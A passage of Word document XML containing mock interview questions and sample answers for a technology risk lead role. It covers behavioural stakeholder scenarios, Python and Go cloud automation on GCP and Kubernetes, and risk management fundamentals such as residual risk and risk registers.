      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 24 - Technology Risk Lead Behavioural Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Behavioural risk leadership: Tell me about a time you had to influence engineering or product teams to fix a technology risk they did not initially prioritize.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioural</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Structure this as a specific story: describe the risk and why the team initially deprioritized it (competing deadlines, not seeing the business impact), explain how you reframed the conversation around concrete impact and consequences rather than just citing policy, and describe the specific action that shifted their prioritization - often data, a relatable scenario, or connecting the risk to something they already cared about. Close with the outcome and what you learned about influencing without direct authority.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Stakeholder communication: How would you explain a critical cloud security risk to senior leadership in business-impact language without overwhelming them with technical detail?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Stakeholder Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Lead with what could happen in business terms (data exposure affecting X customers, potential regulatory fine, service outage risk) before any technical explanation, and use a simple analogy only if it aids understanding rather than technical accuracy for its own sake. State clearly what you're asking for (budget, a policy decision, time) and the consequence of inaction, keeping the technical root cause to one or two sentences that support the business case rather than being the focus of the conversation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Conflict handling: Product wants to release quickly, Security wants stricter controls, and Engineering says the control adds toil. How would you drive a decision?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Decision-Making</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Get specific data from each side - the actual risk the control mitigates, the actual delay it introduces, and the actual toil it creates - rather than letting the disagreement stay at the level of competing opinions, and look for a middle path (an automated version of the control that removes the toil, or a phased rollout that gets most of the risk reduction without the full delay). If no middle path exists, make the tradeoff explicit and escalate to whoever owns that risk decision with a clear recommendation, rather than letting the standoff continue indefinitely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Trusted advisor: Describe how you would build trust with IT, Engineering, Product, Security, Audit, and Business stakeholders as a Technology Risk Lead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Stakeholder Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Build trust by being consistently useful rather than only showing up with findings - help teams understand risk in terms relevant to their goals, follow through reliably on commitments, and avoid surprising people with escalations they didn't see coming. Show technical credibility by understanding their actual systems and constraints (not just citing frameworks), and be willing to say a risk is acceptable when it genuinely is, since a risk function that never says yes loses credibility fast.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Prioritization: You have critical audit findings, recurring incidents, and a weak risk dashboard. How would you prioritize the next 30, 60, and 90 days?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioural</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Days 0-30: address critical audit findings with hard deadlines or active exploitability first, since those carry the most immediate consequence. Days 30-60: dig into the recurring incidents to find and fix the systemic root cause rather than continuing to firefight symptoms. Days 60-90: build out the risk dashboard and reporting cadence so future prioritization is data-driven rather than reactive, establishing the visibility that prevents the next 90 days from looking the same.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Risk culture: Give an example of how you would promote a risk-aware culture without making teams feel blocked or blamed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Risk Culture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Frame risk conversations around 'how do we ship this safely' rather than 'why didn't you think of this', and celebrate teams that proactively raise risks themselves rather than only responding to risks you find, which reinforces that surfacing risk early is valued, not punished. Provide self-service tools and guidance so teams can assess and mitigate common risks themselves without needing to route through a central gatekeeper for everything, which builds ownership rather than dependency or resentment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Remediation ownership: A risk issue is overdue because multiple teams disagree on ownership. How would you move it to closure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Audit/Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Bring the disputing teams together to map exactly which team controls which part of the system the risk touches, since ownership disputes are usually really about unclear system boundaries rather than genuine disagreement about the risk itself. If ownership genuinely remains ambiguous after that, escalate to a shared manager or architecture owner to make the call rather than letting it stay unowned indefinitely, and document the decision so the same ambiguity doesn't recur for future related issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Incident communication: During a major incident with regulatory implications, how would you coordinate technical updates, business impact, risk reporting, and follow-up actions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioural</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Establish separate but synchronized communication tracks - technical updates for the response team, business impact summaries for leadership, and a regulatory/compliance-focused update for legal/audit stakeholders who need specific evidence and timeline documentation - so each audience gets relevant detail without the technical team having to filter for every consumer or non-technical stakeholders drowning in jargon. Keep a single authoritative timeline being maintained throughout (even if summarized differently per audience) so all follow-up actions and regulatory reporting are consistent with what actually happened.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 25 - Python and Go Platform Programming Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Python automation: How would you design a Python script that audits GCP IAM bindings, flags risky roles, and exports a remediation report?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: List all IAM policy bindings across projects using the Cloud Resource Manager and IAM APIs, flag bindings using overly broad predefined roles (Owner, Editor) or bindings granted directly to individuals rather than groups, and cross-reference with IAM Recommender data to identify unused permissions. Export findings to a structured report (CSV or a ticketing system) with severity scoring and a specific recommended remediation per finding, and run it on a schedule so drift toward over-permissioning is caught continuously rather than only during periodic manual reviews.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Python testing: How would you unit test a GCP or Kubernetes automation script without touching real production resources?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Mock the client library calls (unittest.mock or a fake client) so unit tests exercise your decision logic - parsing, filtering, error handling - without making real API calls, and use a genuine but isolated sandbox project for integration tests that do need to hit a live API. Default the script to dry-run mode in any test or CI context, and add an explicit environment guard that refuses to run destructive operations unless the target project matches an allowed non-production pattern, as a safety net against accidental production runs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Python concurrency: When would you use threads, asyncio, multiprocessing, or a worker pool for cloud resource inventory?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: For cloud resource inventory, which is I/O-bound (waiting on API responses), use asyncio with an async client or a ThreadPoolExecutor - both work well since Python releases the GIL during I/O wait, so threads aren't limited by the GIL for this workload. Reserve multiprocessing for genuinely CPU-bound work like heavy post-processing or parsing of the collected data, since spinning up processes for I/O-bound API calls adds unnecessary overhead without a corresponding benefit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Python FastAPI: How would you design a small FastAPI service that exposes self-service infrastructure requests with validation, approval, and audit logs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Define request schemas with Pydantic that validate resource type, size, and required labels at the API boundary, route requests above a risk threshold through an approval dependency (checking an external approval system or requiring a specific role) before provisioning proceeds, and log every request with requester identity, decision, and outcome to a structured audit table. Keep the actual provisioning logic (Terraform execution or direct API calls) behind a queue or background task so the API itself stays responsive and the provisioning step can be retried independently if it fails.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Go fundamentals: What are the main differences between Go and Python for cloud/platform automation, and when would you choose each?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Go compiles to a single static binary with fast startup and lower memory overhead, making it the better choice for long-running services, Kubernetes controllers, and CLIs distributed widely to other engineers where deployment simplicity matters. Python has a larger ecosystem for quick scripting, data manipulation, and faster iteration where startup time and binary distribution aren't concerns - choose Go when building infrastructure that other tooling depends on for reliability and performance, and Python for automation scripts and one-off tooling where development speed matters more.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Go concurrency: Explain goroutines, channels, context cancellation, and wait groups using a platform automation example.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: For a tool auditing thousands of GCP resources concurrently, you'd launch a goroutine per resource (or per worker in a bounded pool) that fetches and processes resource data, using channels to send results back to a collector goroutine safely without shared-memory races. A context with a timeout propagates a cancellation signal to all in-flight goroutines if the overall operation needs to abort early, and a sync.WaitGroup tracks when all worker goroutines have finished so the main function knows it's safe to close channels and read final results.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Go Kubernetes: When would you use client-go or controller-runtime, and how would you design a simple Kubernetes controller?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use raw client-go directly for simple, imperative scripts that just need to list/create/update Kubernetes objects without a reconciliation loop; use controller-runtime (built on top of client-go) when building an actual operator/controller that needs to continuously reconcile desired state, since it provides the informer/cache, reconcile loop scaffolding, and leader election out of the box. A simple controller design defines a Reconcile function that reads the current state of a resource, compares it to desired state, and takes the minimal action needed to converge them, requeueing on error rather than treating every failure as fatal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Go production readiness: What code review checklist would you use before deploying a Go automation service or controller to production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check that errors are handled explicitly and wrapped with context (not silently ignored), goroutines have clear lifecycle management (no leaks, proper context cancellation), resource requests/limits are set appropriately for the deployment, and structured logging/metrics are in place for observability. Verify tests cover error paths and edge cases (not just the happy path), dependencies are pinned via go.sum, and graceful shutdown handling exists so in-flight work isn't abruptly dropped during a rolling update.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 26 - Technology Risk Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What is Technology Risk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Technology Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Technology risk is the possibility that failures, weaknesses, or misuse of technology can disrupt business operations, expose data, create compliance issues, or damage trust. It includes risks from applications, infrastructure, cloud, security, data, vendors, SDLC, and operations. In practice, I manage it by identifying risks early, assessing likelihood and impact, defining controls, tracking remediation, and reporting residual risk to leadership.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What are the different types of technology risks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Technology Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Key types include cybersecurity risk, operational resilience risk, availability risk, data privacy risk, compliance risk, cloud misconfiguration risk, third-party risk, change/release risk, SDLC risk, infrastructure risk, and incident response risk. For a GCP platform, examples include overprivileged IAM, public buckets, insecure Terraform state, weak CI/CD controls, unpatched VMs, and missing monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How do you perform a technology risk assessment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Technology Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I start by understanding the asset, business process, data sensitivity, architecture, dependencies, and threat landscape. Then I identify risks, score likelihood and impact, assess existing controls, calculate residual risk, agree on treatment options, assign owners and due dates, and track remediation through a risk register. I also validate evidence instead of relying only on verbal confirmation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. What is inherent risk vs residual risk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Technology Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Inherent risk is the level of risk before controls are applied. Residual risk is the risk that remains after controls are implemented. For example, exposing a customer API to the internet has inherent risk. After controls like WAF, IAM, TLS, rate limiting, logging, vulnerability scanning, and incident runbooks, the remaining exposure is residual risk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What is risk appetite and risk tolerance?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Technology Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Risk appetite is the amount and type of risk an organization is willing to accept to meet business goals. Risk tolerance is the measurable threshold around that appetite. For example, a company may accept low operational risk for internal tools but have near-zero tolerance for public exposure of customer data or production systems without logging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How do you prioritize risks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Technology Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I prioritize by business impact, likelihood, exploitability, regulatory impact, customer impact, control weakness, and time sensitivity. Critical risks affecting customer data, production availability, privileged access, or regulatory obligations come first. I also consider whether the issue is isolated or systemic across multiple teams or environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Explain the risk management lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Technology Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The lifecycle is identify, assess, treat, monitor, and report. First identify risks through reviews, audits, incidents, threat modeling, and monitoring. Then assess likelihood and impact, choose a treatment such as mitigate or accept, implement controls, monitor effectiveness, and report status, trends, exceptions, and residual risk to stakeholders.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. What is a risk register?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Technology Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A risk register is a structured record of identified risks and their lifecycle status. It helps track ownership, severity, treatment plans, due dates, evidence, residual risk, exceptions, and management decisions. It is important because it creates accountability and gives leadership visibility into the organization's risk posture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What information should a risk register contain?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Technology Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: It should contain risk ID, title, description, asset or process, owner, business impact, likelihood, impact, inherent rating, existing controls, residual rating, treatment plan, due date, status, evidence, dependencies, risk acceptance details, and escalation notes. For cloud risks, I would also include project, environment, service, data classification, and control mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How do you create a risk heat map?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Technology Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
